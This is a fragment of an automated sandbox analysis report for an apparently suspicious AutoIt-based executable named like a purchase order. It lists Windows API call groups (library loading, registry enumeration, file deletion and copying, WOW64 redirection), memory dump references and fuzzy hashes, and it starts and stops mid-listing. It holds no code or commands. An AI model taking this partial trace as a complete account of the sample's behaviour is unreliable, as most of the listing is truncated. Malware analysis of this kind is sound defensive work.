                                  • Part of subcall function 00157620: _wcslen.LIBCMT ref: 00157625
                                • GetProcessId.KERNEL32(00000000), ref: 001DAF38
                                • CloseHandle.KERNEL32(00000000), ref: 001DAF67
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: CloseExecuteHandleProcessShell_wcslen
                                • String ID: <$@
                                • API String ID: 146682121-1426351568
                                • Opcode ID: ab8a30fcdf9bedc7fc9ec6478eea5f9c74371386fa43d6192cfa5bb3df429988
                                • Instruction ID: d979d4b7092b142707d0d6f89055401a653f01793b977740b9181b5ea0f54bc4
                                • Opcode Fuzzy Hash: ab8a30fcdf9bedc7fc9ec6478eea5f9c74371386fa43d6192cfa5bb3df429988
                                • Instruction Fuzzy Hash: 6F717771A00618DFCB14DFA4D485A9EBBF0BF08301F44849AE866AF392D770ED45CB91
                                APIs
                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 001B7206
                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 001B723C
                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 001B724D
                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 001B72CF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ErrorMode$AddressCreateInstanceProc
                                • String ID: DllGetClassObject
                                • API String ID: 753597075-1075368562
                                • Opcode ID: 78e58e9e41c1ba3d7ab008f865c23814530678ffc25eec974ab7e97eae850844
                                • Instruction ID: f7efbdecb95adbb24db153f526c3ba531b84d2f0095e49ae899cdcdc5970d26a
                                • Opcode Fuzzy Hash: 78e58e9e41c1ba3d7ab008f865c23814530678ffc25eec974ab7e97eae850844
                                • Instruction Fuzzy Hash: 0C413171A04204EFDB15CF94C984ADA7BA9EF98310F1580ADFD05DF28AD7B1DA45CBA0
                                APIs
                                • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001E2F8D
                                • LoadLibraryW.KERNEL32(?), ref: 001E2F94
                                • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001E2FA9
                                • DestroyWindow.USER32(?), ref: 001E2FB1
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: MessageSend$DestroyLibraryLoadWindow
                                • String ID: SysAnimate32
                                • API String ID: 3529120543-1011021900
                                • Opcode ID: 0f189231cb64986254bb52c54fba3cc42cb69864f476434765eacebaa4d637ab
                                • Instruction ID: 220eab493e316ff1c9be479fe09a3f774dc70ef901ddde7ff06ab4797fb5cb11
                                • Opcode Fuzzy Hash: 0f189231cb64986254bb52c54fba3cc42cb69864f476434765eacebaa4d637ab
                                • Instruction Fuzzy Hash: 0E21CD72600685ABEB204FA6DCA1FBF77BDEB69364F100228FA50D7190D771DC9197A0
                                APIs
                                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00174D1E,001828E9,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002), ref: 00174D8D
                                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00174DA0
                                • FreeLibrary.KERNEL32(00000000,?,?,?,00174D1E,001828E9,?,00174CBE,001828E9,002188B8,0000000C,00174E15,001828E9,00000002,00000000), ref: 00174DC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressFreeHandleLibraryModuleProc
                                • String ID: CorExitProcess$mscoree.dll
                                • API String ID: 4061214504-1276376045
                                • Opcode ID: 073e18a6e9af43fd527c4f976406648d54d2c504603394560a2b8660a0ccaf5e
                                • Instruction ID: 42286adc43b6447e5a1c4ceec0a82dc098da173af7116daf8408f076b1ae984d
                                • Opcode Fuzzy Hash: 073e18a6e9af43fd527c4f976406648d54d2c504603394560a2b8660a0ccaf5e
                                • Instruction Fuzzy Hash: F3F04F35A40308FBDB129FD4DC49BEDBBB5EF58752F0441A8F949A6660DB309A81CAD0
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E9C
                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00154EAE
                                • FreeLibrary.KERNEL32(00000000,?,?,00154EDD,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154EC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: Wow64DisableWow64FsRedirection$kernel32.dll
                                • API String ID: 145871493-3689287502
                                • Opcode ID: 1a6024698cd0fe5148168b84e6f8a5dfd18af3e8c7689f190f5cfefc9d67495a
                                • Instruction ID: be3d013bd8dfdbdf47974ead1180368ea9011aa367aadbbc6be0b0770b288f19
                                • Opcode Fuzzy Hash: 1a6024698cd0fe5148168b84e6f8a5dfd18af3e8c7689f190f5cfefc9d67495a
                                • Instruction Fuzzy Hash: 4FE0CD35E01622DBD2311765AC1DB9F6595EF82F677090115FC10DB100DB74CD8744F4
                                APIs
                                • LoadLibraryA.KERNEL32(kernel32.dll,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E62
                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00154E74
                                • FreeLibrary.KERNEL32(00000000,?,?,00193CDE,?,00221418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00154E87
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Library$AddressFreeLoadProc
                                • String ID: Wow64RevertWow64FsRedirection$kernel32.dll
                                • API String ID: 145871493-1355242751
                                • Opcode ID: 832668110094dc01b2eabea40d258678c640547807e14ce180f749cbe5bca192
                                • Instruction ID: b7639192e3c66d02ee714366046c33bc27093985dbd3e6533818d3e8189d924e
                                • Opcode Fuzzy Hash: 832668110094dc01b2eabea40d258678c640547807e14ce180f749cbe5bca192
                                • Instruction Fuzzy Hash: A5D0C231902A61E7A6221B256C09DCF2A18EF85F563090114BC10AA110CF34CD8285D0
                                APIs
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001C2C05
                                • DeleteFileW.KERNEL32(?), ref: 001C2C87
                                • CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 001C2C9D
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001C2CAE
                                • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 001C2CC0
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$Delete$Copy
                                • String ID:
                                • API String ID: 3226157194-0
                                • Opcode ID: c24af82af17b2eaf7f664de1c68e3e9f3ac17fac07ddf536afbef695e45f3233
                                • Instruction ID: 4615b53e8d2ec19ea7ace31d2033b3696d09487e5d0c7df43563d4651fcfb31f
                                • Opcode Fuzzy Hash: c24af82af17b2eaf7f664de1c68e3e9f3ac17fac07ddf536afbef695e45f3233
                                • Instruction Fuzzy Hash: 35B13E71900119ABDF25DBA4CC85FDEB7BDEF69350F1040AAF909A7141EB30DA448B61
                                APIs
                                • GetCurrentProcessId.KERNEL32 ref: 001DA427
                                • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 001DA435
                                • GetProcessIoCounters.KERNEL32(00000000,?), ref: 001DA468
                                • CloseHandle.KERNEL32(?), ref: 001DA63D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Process$CloseCountersCurrentHandleOpen
                                • String ID:
                                • API String ID: 3488606520-0
                                • Opcode ID: f43d970dd46c7b9cccfa8862d3ac88050b9e8cf3c76993083068f06eea1ff8c2
                                • Instruction ID: d81b1adf4ea3605746f018c4429fd4f90e5c0d04b8711bf956d938dc5d1db309
                                • Opcode Fuzzy Hash: f43d970dd46c7b9cccfa8862d3ac88050b9e8cf3c76993083068f06eea1ff8c2
                                • Instruction Fuzzy Hash: 11A1A1716043009FD720DF28D886F2AB7E5AF94714F54885DF96A9B392DBB0EC45CB82
                                APIs
                                • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,001F3700), ref: 0018BB91
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,0022121C,000000FF,00000000,0000003F,00000000,?,?), ref: 0018BC09
                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00221270,000000FF,?,0000003F,00000000,?), ref: 0018BC36
                                • _free.LIBCMT ref: 0018BB7F
                                  • Part of subcall function 001829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000), ref: 001829DE
                                  • Part of subcall function 001829C8: GetLastError.KERNEL32(00000000,?,0018D7D1,00000000,00000000,00000000,00000000,?,0018D7F8,00000000,00000007,00000000,?,0018DBF5,00000000,00000000), ref: 001829F0
                                • _free.LIBCMT ref: 0018BD4B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
                                • String ID:
                                • API String ID: 1286116820-0
                                • Opcode ID: b1c59df9dc5a73b079a3b9a9f977fe5a962298ae621bf340a483f7147a7a9a28
                                • Instruction ID: c1d7c6c9ea1a6fc1eb2c653fea2e0db6393b865b6372c5ac80b2619db05ff2f5
                                • Opcode Fuzzy Hash: b1c59df9dc5a73b079a3b9a9f977fe5a962298ae621bf340a483f7147a7a9a28
                                • Instruction Fuzzy Hash: 6051D871908219EFCB24FFA59CC59AEB7B8AF64310B10436AF814D71A1EB309F418F50
                                APIs
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,001BCF22,?), ref: 001BDDFD
                                  • Part of subcall function 001BDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,001BCF22,?), ref: 001BDE16
                                  • Part of subcall function 001BE199: GetFileAttributesW.KERNEL32(?,001BCF95), ref: 001BE19A
                                • lstrcmpiW.KERNEL32(?,?), ref: 001BE473
                                • MoveFileW.KERNEL32(?,?), ref: 001BE4AC
                                • _wcslen.LIBCMT ref: 001BE5EB
                                • _wcslen.LIBCMT ref: 001BE603
                                • SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 001BE650
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
                                • String ID:
                                • API String ID: 3183298772-0
                                • Opcode ID: e9f1f7f81ed2d22c12e80ecce6dd7347809beb3ab4a770d954dd7ea69db08126
                                • Instruction ID: e4e14eb6f10e32388944786fbd4b372fe7c38388edb07f83c299f04b5d9b5507
                                • Opcode Fuzzy Hash: e9f1f7f81ed2d22c12e80ecce6dd7347809beb3ab4a770d954dd7ea69db08126
                                • Instruction Fuzzy Hash: 5E5153B24083859BC724DBA4DC819DF73ECAF95340F00492EF689D7191EF75A68C8766
                                APIs
                                  • Part of subcall function 00159CB3: _wcslen.LIBCMT ref: 00159CBD
                                  • Part of subcall function 001DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,001DB6AE,?,?), ref: 001DC9B5
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DC9F1
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA68
                                  • Part of subcall function 001DC998: _wcslen.LIBCMT ref: 001DCA9E
                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 001DBAA5
                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 001DBB00
                                • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 001DBB63
                                • RegCloseKey.ADVAPI32(?,?), ref: 001DBBA6
                                • RegCloseKey.ADVAPI32(00000000), ref: 001DBBB3
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
                                • String ID:
                                • API String ID: 826366716-0
                                • Opcode ID: 657680c8d6d806752cbe68fd602fd7a1dd4213e762a873070bc820da0ce8ae33
                                • Instruction ID: 794fa9a652abc7f52174d00c4422fd1d865f7f802576022efa2c4b45f9ce44a3
                                • Opcode Fuzzy Hash: 657680c8d6d806752cbe68fd602fd7a1dd4213e762a873070bc820da0ce8ae33
                                • Instruction Fuzzy Hash: B2612A31208241EFD714DF54C8D1E2ABBE5BF84308F55895EF49A8B2A2DB31ED45CB92
                                APIs
                                • VariantInit.OLEAUT32(?), ref: 001B8BCD
                                • VariantClear.OLEAUT32 ref: 001B8C3E
                                • VariantClear.OLEAUT32 ref: 001B8C9D
                                • VariantClear.OLEAUT32(?), ref: 001B8D10
                                • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 001B8D3B
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Variant$Clear$ChangeInitType
                                • String ID:
                                • API String ID: 4136290138-0
                                • Opcode ID: f007cf2f633de0a7c347d8c86cdebb41ad97e14fcdd33fdb89f0eae85f3bf2ca
                                • Instruction ID: 5d89eaa1567797e7967c3384e7f7852d5be5ffef6afd645e0db0477f1390e12d
                                • Opcode Fuzzy Hash: f007cf2f633de0a7c347d8c86cdebb41ad97e14fcdd33fdb89f0eae85f3bf2ca
                                • Instruction Fuzzy Hash: F6516AB5A00219EFCB14CF68C894AEAB7F8FF8D710B15855AE909DB350E730E911CB90
                                APIs
                                • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 001C8BAE
                                • GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 001C8BDA
                                • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 001C8C32
                                • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 001C8C57
                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 001C8C5F
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: PrivateProfile$SectionWrite$String
                                • String ID:
                                • API String ID: 2832842796-0
                                • Opcode ID: e59500741d3b6a4919e70e43b48bd0b11c54bfa24b336bd5b49937ef85083cf4
                                • Instruction ID: 2780e3c34c26c0cf3772a560e3aedfe3f933597bdbdd8a201400bd3eba70c0ca
                                • Opcode Fuzzy Hash: e59500741d3b6a4919e70e43b48bd0b11c54bfa24b336bd5b49937ef85083cf4
                                • Instruction Fuzzy Hash: 70513835A00215DFCB04DF64D881EADBBF5BF58314F088458E859AB3A2DB31ED55CB90
                                APIs
                                • LoadLibraryW.KERNEL32(?,00000000,?), ref: 001D8F40
                                • GetProcAddress.KERNEL32(00000000,?), ref: 001D8FD0
                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 001D8FEC
                                • GetProcAddress.KERNEL32(00000000,?), ref: 001D9032
                                • FreeLibrary.KERNEL32(00000000), ref: 001D9052
                                  • Part of subcall function 0016F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,001C1043,?,7529E610), ref: 0016F6E6
                                  • Part of subcall function 0016F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,001AFA64,00000000,00000000,?,?,001C1043,?,7529E610,?,001AFA64), ref: 0016F70D
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
                                • String ID:
                                • API String ID: 666041331-0
                                • Opcode ID: 1bcb264de524da8c68fd97e4c9c86c691c9a87ff137934c8bbd553fb17d63559
                                • Instruction ID: 55dbca4feff6290d00a17cd06bc149cb10f36b5ead40adc4df62f888b0303c59
                                • Opcode Fuzzy Hash: 1bcb264de524da8c68fd97e4c9c86c691c9a87ff137934c8bbd553fb17d63559
                                • Instruction Fuzzy Hash: 6F515C35604205DFCB15EF68D4848ADBBF1FF59314B0580A9E81A9F362DB31ED8ACB91
                                APIs
                                • SetWindowLongW.USER32(00000002,000000F0,?), ref: 001E6C33
                                • SetWindowLongW.USER32(?,000000EC,?), ref: 001E6C4A
                                • SendMessageW.USER32(00000002,00001036,00000000,?), ref: 001E6C73
                                • ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,001CAB79,00000000,00000000), ref: 001E6C98
                                • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 001E6CC7
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: Window$Long$MessageSendShow
                                • String ID:
                                • API String ID: 3688381893-0
                                • Opcode ID: 9a7d9f05e04da60fdc43c99a4b5471cb8341ddb7ae7ae70d8a2750c2954d00bf
                                • Instruction ID: 8bde7ba1e71ddbf6e67be9aae008adb3258c26e98a2492320cafce4b546be42b
                                • Opcode Fuzzy Hash: 9a7d9f05e04da60fdc43c99a4b5471cb8341ddb7ae7ae70d8a2750c2954d00bf
                                • Instruction Fuzzy Hash: 8741F735600584AFD724CF6ACC98FAD7BA5EB19390F650228FC99A73E0C371ED41CA80
                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.2061643602.0000000000151000.00000020.00000001.01000000.00000003.sdmp, Offset: 00150000, based on PE: true
                                 • Associated: 00000000.00000002.2061626649.0000000000150000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.00000000001EC000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061698110.0000000000212000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061743079.000000000021C000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2061759854.0000000000224000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_150000_PO2-2401-0016 (TR).jbxd
                                Similarity
                                • API ID: _free
                                • String ID:
                                • API String ID: 269201875-0
                                • Opcode ID: 63a239796ca843c4b27a952fbeee5dd19c71b93c954a33a1c89f9c7b6852653a
                                • Instruction ID: 70b838e9fca00b8ca448654e9b1d255c0162866eaf89ada6b0eb898f84553216
                                • Opcode Fuzzy Hash: 63a239796ca843c4b27a952fbeee5dd19c71b93c954a33a1c89f9c7b6852653a
                                • Instruction Fuzzy Hash: BB41D376A002009FCB25EF78C885A9DB7F5EF99314F268569E515EB391DB31EE01CB80
                                APIs
                                • GetCursorPos.USER32(?), ref: 00169141
                                • ScreenToClient.USER32(00000000,?), ref: 0016915E
